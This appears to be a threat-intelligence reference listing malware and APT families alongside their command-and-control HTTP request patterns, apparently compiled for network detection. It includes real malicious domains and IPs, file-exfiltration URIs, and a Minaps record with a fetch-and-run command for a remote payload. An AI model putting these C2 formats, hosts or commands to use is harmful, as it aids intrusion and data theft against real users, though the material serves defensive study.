APT Mirage POST /resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow
APT Mirage – later var GET /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg
CRIME Money loader GET /get_xml?file_id=25227372
/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536
APT Mongal GET /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000 000000000000000000000000000 0000
APT Murcy GET /150828
APT Netravler GET /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT
APT Netravler GET /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt
APT Netravler GET /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end
/nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc&hostip=10.12.0.23&filename= travlerbackinfo-2012-1-
APT NfLog GET /IElog/TestURL.asp HTTP/1.0
APT NfLog POST /NfLog/Nfile.asp
APT NTESSESS GET /6K8gL8.html
APT PNG trojan GET /index.htm
APT Poison Ivy GET 256 bytes of seemingly random data after a successful TCP handshake, then 48-byte "keep-alive" requests
APT RedOctober AuthInfo POST http://%s:%s%s
APT RedOctober Sysinfo POST /cgi-bin/nt/sk
APT RegSubDat POST /5501000000/log
APT Sanny / Win32.Daws POST /write.php
APT Seasalt GET /postinfo.html
APT Sofacy POST /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01
APT Sofacy POST /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS
CRIME Srizbi GET /cb_4.exe
CRIME Stabuniq POST /rssnews.php
APT Sykipot / Wyksol GET /kys_allowget.asp?namegetkys.kys
APT Taidoor GET /apzsr.php?id=021793111D309GE67E
APT Tarsip Eclipse GET /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0
APT Tarsip Moon GET /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230
CRIME Tbot tor n
CRIME Tinba aka Zusy POST /h/index.php
APT Vinself POST /w880/T19R17Q16/12010L11014
CRIME Vobfus GET /XEuPCLrf?e
APT WEBC2-Bolid GET /firefox.html
APT WEBC2-Clover GET /Default.asp
APT WEBC2-CSON GET /Default.aspx?INDEX=10_random_characters>
APT WEBC2-CSON Response to commands POST /Default.aspx?ID=IMNQRSSRXK
APT WEBC2-HEAD GET /
APT WEBC2-Table GET /order.htm
CRIME Xpaj POST /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh
APT Xtreme Rat GET /1234567890.functions
APT Xtreme Rat GET /1234567890.functions
CRIME Zeus Gameover GET /search.php?page=73a07bcb51f4be71
CRIME BitcoinMiner POST {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}
CRIME Blazebot IRC NICK USA|94576
USER vtptdwd 0 0 :USA|94576
CRIME Nurjax Adware GET /services/rules.txt?dummy=916
CRIME Tosct GET Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV
CRIME Nocpos GET POST /check/echo
/check
CRIME OnionDuke GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg=
s/sysinfo_7.php
/forum/phpBB3/prx_26.php
APT Lagulon (Operation Cleaver) POST /contador/server.php
/i/server.php
/includes/server.php
APT? Medusa POST %s/bbc_mirror/%s/search?id=%s
/CNN_Mirror/EN/%s/search?id=%s
|00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00
CRIME Toopu GET /toopu.png
/%s:1048%s
/num3.html
/web/get_ad3.asp?type=loadall&machinename= -6C78A9C3&cr=yes
/num3_51la.asp
CRIME Twerkin GET /classes/functions.php?functionname=online
/classes/functions.php?functionname=getupdates
/classes/functions.php?functionname=getcommand
CRIME TzeeBot / TinyZBot POST /checkupdate.asmx
CRIME XLS URLDownload ToFileA function for Dridex GET /koh/mui.php
CRIME Quervar / Induc.C / Dorifel GET /js/way.php?00021708&pin=7DF38AD66C78A9C3
/404/way.php?00038F50&pin=7DF38AD66C78A9C3
/test/php/way.php?0002E170&pin=7DF38AD66C78A9C3
/1.php?JXU9WXFG&pin=DEC09603F4CEFD80
CRIME Feidowns downloader / Kilim (?) / Cracktools GET yeniadmin.php?os=WindowsXP
/yeniadmin.php?os=Windows7&osbit=64&antiv
/yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI
http://whos.amung.us/pingjs/?k=yenikazi
CRIME GameVance Adware GET /aj/updtah.php
CRIME OpenShopper Adware GET //mmsv/Access3.php
//opendb/mmsv.php
//mmsv/Access2.php
/opapp/postmedia1/Update.dat
/opapp/postmedia1/OKUpdate.exe
CRIME SoftPulse Adware GET /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D
CRIME FakeAV GET /[…]/load.php?file=uploader
/[…]/load.php?file=grabbers
/[…]/load.php?file=1
/ohwgx3kiTh/document.doc
/ohwgx3kiTh/load.php?file=0
CRIME Wauchos (download by Zbot of Cridex) POST /ssdc32716372/file.php
/auto*.it/*/jeve.exe
//dd*.ru/old.exe
CRIME Blackenergy DDos Bot POST id=[bot_id]&bid=[base64_encoded_build_id]&dv=[x]&mv=[y]&dpv=[z]
id=[bot_id_sha1]&bid=[base64_encoded_build_id]&nm=[x]&cn=[y]&num=[z]
The only major difference is that the id field contains just the hash instead of the actual string.
CRIME Alurewo / Alureon pay per click GET /click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5
CRIME OSX Wirelurker GET mac/getversion.php?sn=
CRIME Systweak Adware – Systweak RegClean Pro & Advanced System Protector GET /getipaddress.asp
CRIME MPlug / Multiplug Adware GET /?step_id=1&sf=1&installer_id=8605008392702878770&publisher_id=2356&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=7371188128136903471&external_id=0&installer_type=IX_2013&hardware_id=15979643602580996082&session_id=17077067485576374638&installer_file_name=Doctorow%2C+E+L+-+3+books+.rar&filesize=4.5+MB&product_name=TusFiles&product_title=Doctorow%2C+E+L+-+3+books+.rar&product_download_url=http%3A%2F%2Fk.tusfiles.net%2Fd%2F74la37ldtz2fvxijot2ypuiocogpoue4j7hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+-+3+books+.rar&product_file_name=Doctorow%2C+E+L+-+3+books+.rar&project_encode_id=2356&ttl=1422295723363&isRedirected=1&enc_u_p=1&st=0&IX_Startapp=1&self_redirect=0&st=0&reffer=http%3A%2F%2Ftusfiles.net%2F&for_html_installer=1&layout_id=8&project_name=TusFiles&uuid=%252A
CRIME Nemucod JS GET /document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=2129391
CRIME Andromeda / Wauchos POST /and/gate.php
CRIME Poweliks click-fraud GET /click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0
CRIME Poweliks click-fraud GET /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9
CRIME Yoddos / Darkshell / YoYoDDoS 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u… ……..
APT Cobra / Turla POST /%s/%s?uid=%d&context=%s&mode=text&data=%s
APT Panda POST /forum/login.cgi
APT Panda POST /Photos/Query.cgi?loginid=
APT Aided Frame GET /img/js.php
APT Scanbox Watering hole framework POST /i/recv.php
CRIME Blackenergy DDos Bot GET /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php
APT Syria Twitter.apk POST /contacts
APT TinyBaron / Miniduke / CosmicDuke GET /modules/db/mgr.php?
/modules/db/mgr.php?F=3?
CRIME? Moure GET /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM=
/HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k
/HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n
/G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr
/GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu
/FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k
CRIME Vundo GET /webhp
/wpad.dat
CRIME / APT Lostdoor RAT INFO||LostDoor-001|Remote PC|| Windows XP Professional||511.56 MB|No|C:\WINDOWS\system32\cmd.exe|2:13:42
APT Protux worm POST http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3
http://202.71.136.14:80/ggBwkFNqDu1869.avi
/newTroy.jpg
/http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3
CRIME Conficker / Kido worm GET / ip checking services
CRIME Dingu / Proxy GET /1.jpg
http://webemail.bounceme.net:8080/directget42.gif
CRIME Dyre GET /1/manualec.pdf
CRIME Zeus GET /ycJ2Jj7r4t3wc6y4/ali.jpg
CRIME Cryptowall POST /tpnofu223t8h8dl
CRIME Cryptowall POST /4175iq691v3l
GET /raw
CRIME Galapoper / Tibs Downloader GET /pic/tool.jpg
/pic/search.jpg
/pic/tibs.jpg
/pic/proxy.jpg
/pic/winlogon.jpg
APT Wykcores GET /279843
/279859
/280015
/287171
/315171
/110937
/111968
/113000
/114031
/115062
ADV Ads – Zenovia Digital Exchange (not necessarily malicious) GET /?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs
CRIME EsFury worm GET http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA
http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT
CRIME PornoAsset / LockEmAll Ransomware GET /a.php?f=647&e=2
CRIME FakeAV Privacy Center GET /dfgsdfsdf.php
/mf.php
/css/new-mobile.css
/js/wsjs.js
/js/caf.js
CRIME Zeus V2 (drop zone, config) GET / POST /panel3/gotobank.php
/panel3/ppnl3.exe
/panel3/ppnl3.bin
/ppnl3.bin
CRIME Blathla / Cadro adware GET /1.gif
CRIME Vundo / Krap POST /
CRIME Vundo / Krap POST /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA
CRIME VOlk bot GET /WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1
User-Agent: vb wininet
Host: portalcinemark.us
CRIME Oficla / Sasfis GET /21/download.php?expid=0&fid=1
/s/download.php?expid=4&fid=1
/l1/bb.php?v=200&id=554905388&b=9468674099&tm=3
/dmr/bb.php?v=200&id=554905388&b=OLD&tm=3
/np/load.php?spl=hcp&b=ff&o=xp&i=hcp
/phpbb/image2/cp.php?i=15
APT Pingbed GET /default.htm
/default1.htm
/default2.htm
APT Minaps backdoor GET / POST /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko
/download/logo.png
/download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A
POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi
CRIME QHost / Orsam / Bicololo GET /stat/tuk/183
